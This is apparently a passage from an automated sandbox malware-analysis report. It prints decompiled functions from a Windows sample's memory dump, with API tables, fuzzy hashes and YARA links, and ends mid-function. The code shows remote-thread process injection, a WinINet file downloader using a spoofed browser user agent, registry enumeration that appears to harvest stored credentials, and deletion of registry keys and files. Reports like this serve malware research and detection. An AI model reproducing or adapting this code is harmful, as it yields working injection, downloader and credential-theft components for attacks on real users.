				E00406D1E(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 4;
				E0040C9FD(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E00411E3D( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00412BC6(__ebx, 0x474,  &_v1168);
				}
				if( *0x41eaa0 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x0040570f
0x0040570f
0x0040571f
0x00405726
0x00405734
0x00405738
0x0040573f
0x00405747
0x00405749
0x00405750
0x00405752
0x00405757
0x00405763
0x0040576a
0x00405771
0x00405778
0x00405785
0x004057a1
0x004057b0
0x004057b4
0x004057b8
0x004057b9
0x004057c2
0x004057ca
0x004057cf
0x004057d7
0x004057f1
0x004057f6
0x004057f6
0x00405802
0x00405806
0x00405806
0x00405813

APIs

Part of subcall function 00406D1E: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00405734
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00405747

Part of subcall function 00404C55: SetEvent.KERNEL32(00405757,00000000), ref: 00404C5B
Part of subcall function 00404C55: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404C6E

Part of subcall function 00405D8B: SHDeleteValueW.SHLWAPI(80000001,?,?,C003C81E,?,00000000,?,750D46D0), ref: 00405DC7
Part of subcall function 00405D8B: Sleep.KERNEL32(000001F4), ref: 00405DD6
Part of subcall function 00405D8B: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00405DEC

Part of subcall function 0041652E: FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041655F
Part of subcall function 0041652E: FindNextFileW.KERNEL32(00000000,?), ref: 004165BA
Part of subcall function 0041652E: FindClose.KERNEL32(00000000), ref: 004165C5
Part of subcall function 0041652E: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 004165D1
Part of subcall function 0041652E: RemoveDirectoryW.KERNEL32(?), ref: 004165D8

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00405785
CharToOemW.USER32 ref: 004057A1
CharToOemW.USER32 ref: 004057B0
ExitProcess.KERNEL32 ref: 00405806

Part of subcall function 00412BC6: CharToOemW.USER32 ref: 00412BF6
Part of subcall function 00412BC6: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00412C7A

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: 29b020cf0e55934d69ef25c8ccda6bc3e7d883894e09ae0c867483f771e480d9
Instruction ID: 767ae8e146145c6531c1a412c3b787a599ec344bb90e70691746e2ead1a9bad0
Opcode Fuzzy Hash: 29b020cf0e55934d69ef25c8ccda6bc3e7d883894e09ae0c867483f771e480d9
Instruction Fuzzy Hash: 37219272508344ABC230ABA5DC0AFDB7B9CEFC4314F00492BBA59E7191DB74A515CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412F48, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412F48(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E004110D6(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0041621B(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E00411106(_v20);
				goto L13;
			}

0x00412f65
0x00412f6e
0x00412f73
0x00413013
0x00413019
0x00413019
0x00412f7e
0x00412f83
0x00412f88
0x00412fff
0x00413000
0x00413009
0x0041300e
0x0041300e
0x00000000
0x00413009
0x00412f8a
0x00412f8d
0x00412fba
0x00000000
0x00000000
0x00412fbf
0x00412fed
0x00412ff3
0x00000000
0x00412ff3
0x00412fd5
0x00000000
0x00000000
0x00412fd7
0x00412fdd
0x00000000
0x00000000
0x00412fdf
0x00412fe8
0x00000000
0x00000000
0x00000000
0x00412fea
0x00412ffa
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,00000000,?), ref: 00412F68
WaitForSingleObject.KERNEL32(?,00000000), ref: 00412F96
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00412FB2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00412FCD
FlushFileBuffers.KERNEL32(00000000), ref: 00412FED
CloseHandle.KERNEL32(00000000), ref: 00413000

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: 23325d92bdc62691a9ec2d4e26d23397b9da2a4af08ec94fc022dd4a73fab8da
Instruction ID: 0cc13833b9fae889fce273b242953054ebbd9d13bb13754fcb7d39e638d87504
Opcode Fuzzy Hash: 23325d92bdc62691a9ec2d4e26d23397b9da2a4af08ec94fc022dd4a73fab8da
Instruction Fuzzy Hash: 37219231904148BFDF119FA4CD84BEEBB75BB04345F10406AF511F21A1C3B58DA6AB28

Uniqueness

Uniqueness Score: -1.00%

Function 004160D5, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004160D5(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x004160d5
0x004160e8
0x004160fa
0x00416100
0x00416106
0x00416176
0x00416176
0x00416108
0x0041610d
0x00416115
0x0041616d
0x00416170
0x00000000
0x0041611c
0x0041611c
0x0041611f
0x00416124
0x00416135
0x0041613b
0x0041613f
0x00000000
0x00416141
0x00416155
0x00416167
0x00000000
0x00000000
0x00000000
0x00000000
0x00416155
0x00416126
0x00416126
0x00416128
0x00416128
0x00416128
0x00416124
0x00416115
0x0041617a

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00407194,?,?,00000000), ref: 004160FA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000000), ref: 0041610D
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00407194,?,?,00000000), ref: 00416135
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00407194,?,?,00000000), ref: 0041614D
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00407194,?,?,00000000), ref: 00416167
CloseHandle.KERNEL32(?,?,?,?,?,00407194,?,?,00000000), ref: 00416170

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 6f3ed4aff5a9fbf0d2ae1d17149426a97925f748f7d498ad90c2d4712085782e
Instruction ID: 991d44a1bbe81340d5af1d4786159d8d8574690b5f5d58831c840edd2ba148e8
Opcode Fuzzy Hash: 6f3ed4aff5a9fbf0d2ae1d17149426a97925f748f7d498ad90c2d4712085782e
Instruction Fuzzy Hash: B811C475100200BFDB218F21CC49EBB7BB9EB55B00B11492DF996E61B1D374E880CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00417C8C, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00417C8C(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x41e590 & 0x00000004) == 0 || E00406B23() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x41fe7c);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x00417c97
0x00417c9b
0x00417d0d
0x00000000
0x00417ca6
0x00417cb2
0x00417cb6
0x00000000
0x00417cbd
0x00417ccc
0x00417cd6
0x00417cdc
0x00417cec
0x00417cf4
0x00417cfb
0x00417cfe
0x00417d04
0x00417d07
0x00417d0a
0x00000000
0x00417d0a
0x00417cb6

APIs

GetUpdateRgn.USER32 ref: 00417D14

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

TlsGetValue.KERNEL32 ref: 00417CAC
SetRectRgn.GDI32(?,?,?,?,?), ref: 00417CCC
SaveDC.GDI32 ref: 00417CDC
SendMessageW.USER32(?,00000014,?), ref: 00417CEC
RestoreDC.GDI32(?,00000000), ref: 00417CFE

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: b6dea842841ea200ac5d72fbbddbb7675df32af042fbd8d8421f721a9c14a327
Instruction ID: 9643f0f25aa6e03bb5de02e0beff3b1c25364df8954d829a171a2ab27ad42d63
Opcode Fuzzy Hash: b6dea842841ea200ac5d72fbbddbb7675df32af042fbd8d8421f721a9c14a327
Instruction Fuzzy Hash: 00119A31004705AFCB225F60FD48FAABBB5FF08711F10892AFA8691671D7399490DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBF5, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040CBF5(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E00406A38(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x41e5a4 + E00407164, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x0040cbf5
0x0040cbf8
0x0040cc06
0x0040cc0f
0x0040cc11
0x0040cc13
0x0040cc15
0x0040cc1a
0x0040cc1f
0x0040cc23
0x0040cc37
0x0040cc3d
0x0040cc42
0x0040cc67
0x0040cc44
0x0040cc4a
0x0040cc53
0x0040cc59
0x0040cc59
0x0040cc42
0x0040cc6e
0x0040cc74
0x0040cc7b

APIs

OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC09
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00825708,00000000,00000000,00000000), ref: 0040CC37
WaitForSingleObject.KERNEL32(00000000,00002710,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC4A
CloseHandle.KERNEL32(74B5F560,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC53
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC67
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC6E

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: d6d0b9c207e60d564cddc021523e77bd9ef861cde39fcc809f557f2628063155
Instruction ID: a2ba2c77e85f9073fc325a49aad7f1720fe9d129045ecfcb5b85ced238eaadfa
Opcode Fuzzy Hash: d6d0b9c207e60d564cddc021523e77bd9ef861cde39fcc809f557f2628063155
Instruction Fuzzy Hash: FC019EB2108148BFEB012BA5DDCCDAF3F6CDB8A394B004179FA06B6260C6794C458779

Uniqueness

Uniqueness Score: -1.00%

Function 00412CDA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412CDA(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x41e00c; // 0x41e00c
					_t2 = _t18 +  &E0041E008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x00412cda
0x00412cda
0x00412ce0
0x00412ce2
0x00412ce2
0x00412cf7
0x00412cfb
0x00412d3f
0x00000000
0x00412d3f
0x00412cfe
0x00412d00
0x00412d02
0x00412d09
0x00412d10
0x00412d16
0x00412d19
0x00412d2d
0x00412d36
0x00412d39
0x00000000
0x00412d39
0x00412d43

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00412CF1
InternetSetOptionA.WININET(00000000,00000002,0041E00C,00000004), ref: 00412D10
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00412D2D
InternetCloseHandle.WININET(00000000), ref: 00412D39

Strings

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725, xrefs: 00412CE2, 00412CF0

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725
API String ID: 910987326-1481029682
Opcode ID: 5627bae8431e81c063dd5b7ff6de9326b9d61d2d441dcf590cb6ffabc8bdf702
Instruction ID: 3bf49a69015dc422e65a87719373eee5d0b366d2d2caf7c09ae33d9acccb90ca
Opcode Fuzzy Hash: 5627bae8431e81c063dd5b7ff6de9326b9d61d2d441dcf590cb6ffabc8bdf702
Instruction Fuzzy Hash: 7AF090722006107BE7215772AD8CDBB7E6DEBC9B59B140929FA86E2071D27588A0C77C

Uniqueness

Uniqueness Score: -1.00%

Function 0041314E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041314E() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00411564( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x0041315d
0x0041315f
0x00413165
0x0041316a
0x00413172
0x0041317a
0x00413180
0x00413187
0x0041318d
0x0041318e
0x00413191
0x0041319b
0x004131a0
0x004131a2
0x004131a2
0x004131a8
0x004131be
0x004131be
0x004131c0
0x004131c4
0x004131c4
0x004131ce

APIs

LoadLibraryA.KERNEL32(urlmon.dll,?), ref: 0041315F
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413172
FreeLibrary.KERNEL32(00000030), ref: 004131C4

Strings

ObtainUserAgentString, xrefs: 0041316C
urlmon.dll, xrefs: 00413158

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 853c15b51556f5003ab3f876cf445a5f51f48c10f98790f184ff3bcf9a5ff4f3
Instruction ID: 52984c0add2edbe58341470ab1e983cc86aa4a90ee0d49fb8c3f92f61a2a7f58
Opcode Fuzzy Hash: 853c15b51556f5003ab3f876cf445a5f51f48c10f98790f184ff3bcf9a5ff4f3
Instruction Fuzzy Hash: 610188B1901254BBCB119FE49D844DE7A78AB04711F1001BAE755F3290D6348F848B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A5, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040B6A5(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E004110D6(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E0040CA33(0x83,  &_v216);
					_t141 =  &_v284;
					E0040CA33(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E004111B9( &_v36,  &_v36, 0, 8);
					E0040CA33(0x85,  &_v120);
					E0040CA33(0x86,  &_v100);
					E0040CA33(0x87,  &_v60);
					_t145 =  &_v80;
					E0040CA33(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E004150D3(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E004150D3(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E004150D3(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E004151FB(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E0040B64B(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E0040CA33(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t129);
											_push(_t121 + 0x1fe);
											_t51 = _t129 + 0x1fe; // 0x201
											_t124 = E00411DF9(_t145, 0x307, _t51, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E004114FA(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E00411106(_v24);
					if(_v32 <= _t134) {
						return E00411106(_v36);
					}
					return E004095BC(0x307, _v36, 0xcb);
				}
			}

0x0040b6a5
0x0040b6b6
0x0040b6bb
0x0040b6bd
0x0040b6bf
0x0040b6c4
0x0040b91d
0x0040b6ca
0x0040b6d5
0x0040b6da
0x0040b6e5
0x0040b6f0
0x0040b6f7
0x0040b6ff
0x0040b70c
0x0040b719
0x0040b726
0x0040b72b
0x0040b733
0x0040b738
0x0040b73e
0x0040b741
0x0040b749
0x0040b764
0x00000000
0x00000000
0x0040b77d
0x0040b780
0x0040b78f
0x0040b8da
0x0040b8dd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b795
0x0040b795
0x0040b795
0x0040b798
0x0040b7aa
0x0040b7af
0x0040b7b2
0x0040b7b7
0x0040b7d4
0x0040b7da
0x0040b7df
0x0040b7e4
0x0040b7f9
0x0040b7fe
0x0040b803
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b811
0x0040b811
0x0040b811
0x0040b81c
0x0040b824
0x0040b82f
0x0040b844
0x0040b831
0x0040b835
0x0040b83d
0x0040b83d
0x0040b846
0x0040b84c
0x0040b852
0x0040b85c
0x0040b860
0x0040b866
0x0040b867
0x0040b86c
0x0040b86f
0x0040b870
0x0040b872
0x0040b878
0x0040b881
0x0040b887
0x0040b88c
0x0040b891
0x0040b89d
0x0040b8a7
0x0040b8a9
0x0040b8a9
0x0040b8a7
0x0040b891
0x0040b85c
0x00000000
0x0040b84c
0x0040b7e4
0x0040b8ac
0x0040b8c0
0x0040b8d0
0x0040b8d8
0x00000000
0x0040b8e3
0x0040b8e3
0x0040b8e6
0x0040b8f3
0x0040b8fb
0x00000000
0x0040b914
0x00000000
0x0040b90a

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,00000003,?,00000000,00000008,?,00000000), ref: 0040B75C
RegEnumKeyExW.ADVAPI32(00000003,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B787
RegCloseKey.ADVAPI32(00000003,?,00000000), ref: 0040B8DD

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

RegEnumKeyExW.ADVAPI32(00000003,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000), ref: 0040B8CA

Part of subcall function 004150D3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407A8E,?,?,00000104), ref: 00415169

RegOpenKeyExW.ADVAPI32(00000003,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 0040B827

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 7bb4c856288b58a0bce8df277c0f625b1c3759c389c5f5d978419ef1c0a1891f
Instruction ID: 62d81f5d220e74f88abece2aee467ed304837e34b4cbb7ff47f66c112ff9e10e
Opcode Fuzzy Hash: 7bb4c856288b58a0bce8df277c0f625b1c3759c389c5f5d978419ef1c0a1891f
Instruction Fuzzy Hash: 8671FB72D00119ABDB11EBA5CD45AEFB7BCEF48304F14417AF605F32A1D7389A458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A76B, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040A76B(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E00416745( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E004110D6(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E00411106(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00411FB6(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E004110D6(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
